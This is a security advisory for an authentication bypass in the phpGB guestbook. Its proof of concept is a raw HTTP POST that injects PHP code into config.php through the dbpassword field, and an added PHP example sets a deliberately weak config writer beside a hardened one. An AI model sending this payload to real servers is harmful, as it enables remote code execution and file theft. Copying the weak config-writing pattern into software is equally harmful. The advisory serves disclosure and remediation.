ppp-design found the following design error in phpGB:
Details
Product: phpGB
Affected Version: 1.20 and maybe all versions before
Immune Version: 1.30
OS affected: all OS with php
Vendor-URL: http://www.walzl.net
Vendor-Status: informed, new version available
Security-Risk: high - very high
Remote-Exploit: Yes
Introduction
phpGB is a PHP/MySQL based guestbook. The admin can change all settings through a PHP interface. Unfortunately the script lacks correct authentication, so anyone is able to overwrite a config file, which leads to a DoS or to running arbitrary PHP code on the server.
More details
The problem is in /admins/savesettings.php. The only authentication check is that the page is requested via POST. That is why it is very easy to bypass authentication and write anything to /include/config.php. Because this is a core file of the software, included on nearly every page, a syntax error leads to a DoS of the whole guestbook. A further security aspect is the ability to insert arbitrary commands into the config file. By avoiding syntax errors, an attacker is able to execute any PHP command on the server.
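The following is an added example and not code from phpGB or from ppp-design: a hypothetical reconstruction of the two defects described above (a request-method-only "authentication" check and verbatim interpolation of form values into config.php), placed beside a hardened version that checks a real admin session, whitelists the settings keys, serializes values with var_export() so a quote in the input can never close the literal, and writes the file atomically so a half-written config.php can never be included. Function names, the session keys and the settings keys are assumptions.

```php
<?php
// Added example, not phpGB's code. Function names and session keys are assumptions.

// Weak: the only gate is that the request is a POST.
function is_authorized_weak(): bool
{
    return ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST';
}

// Weak: each value is pasted into PHP source inside a double-quoted literal.
// The advisory's payload  ";phpinfo();$a="  closes the literal and injects code.
function render_config_weak(array $settings): string
{
    $src = "<?php\n";
    foreach ($settings as $k => $v) {
        $src .= "\$$k = \"$v\";\n";
    }
    return $src;
}

// Hardened: require an admin flag set by a separate login step (assumed
// session key 'is_admin') and a CSRF token bound to that session.
function is_authorized_hardened(array $post): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $loggedIn = ($_SESSION['is_admin'] ?? false) === true;
    $tokenOk  = isset($post['csrf'], $_SESSION['csrf'])
             && hash_equals($_SESSION['csrf'], (string) $post['csrf']);
    return $loggedIn && $tokenOk;
}

// Hardened: whitelist the keys and let var_export() produce correctly quoted
// literals, so quotes and semicolons in the input stay inside the string.
function render_config_hardened(array $post): string
{
    $allowed = ['dbpassword', 'toolbar', 'messenger', 'smileys', 'title',
                'db_session_handler', 'all_in_one'];
    $settings = [];
    foreach ($allowed as $k) {
        $settings[$k] = (string) ($post[$k] ?? '');
    }
    return "<?php\nreturn " . var_export($settings, true) . ";\n";
}

// Write to a temp file and rename, so a request that dies mid-write cannot
// leave a truncated (syntax-error) config.php behind: that is the DoS case.
function write_config(string $file, string $src): void
{
    $tmp = $file . '.tmp';
    file_put_contents($tmp, $src, LOCK_EX);
    rename($tmp, $file);
}

// Demonstration from the CLI with the advisory's payload (URL-decoded).
$post = ['dbpassword' => '";phpinfo();$a="', 'toolbar' => '1'];
echo "--- weak output (code injected) ---\n", render_config_weak($post);
echo "--- hardened output (payload stays a string) ---\n", render_config_hardened($post);

// Confirm the hardened file is still valid PHP and that the value round-trips.
$file = sys_get_temp_dir() . '/config_demo.php';
write_config($file, render_config_hardened($post));
$loaded = require $file;
var_dump($loaded['dbpassword'] === $post['dbpassword']);
unlink($file);
```

The weak renderer shows why the advisory's payload works: the injected quote ends the string and the rest of the value is parsed as code. The hardened renderer returns an array from the config file instead of defining variables, which also makes the authenticated writer independent of how the rest of the application names its settings.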
Proof-of-concept
After running the following proof of concept, you are presented with phpinfo() on every page of the guestbook. Of course you can insert any PHP code instead of phpinfo(); into /include/config.php. (\n is newline)
telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1&messenger=1&smileys=1&title=1&db_session_handler=0&all_in_one=0&test=\n
\n
Temporary-fix
Use .htaccess to restrict access to admin pages.
Fix
Use at least phpGB 1.30.
Security-Risk
Because an attacker is able to execute any PHP command, he is able to read all files, including .htaccess or .htpasswd files or any password-protected pages. Depending on system security he might be able to run any shell command on the server. That is why we rate this security issue high - very high.
Vendor status
After we informed the author, he needed about 12 hours to release a new version.
Disclaimer
All information that can be found in this advisory is believed to be true, but maybe it isn't. ppp-design cannot be held responsible for the use or misuse of this information. Redistribution of this text is only permitted if the text has not been altered and the original author ppp-design (http://www.ppp-design.de) is mentioned.
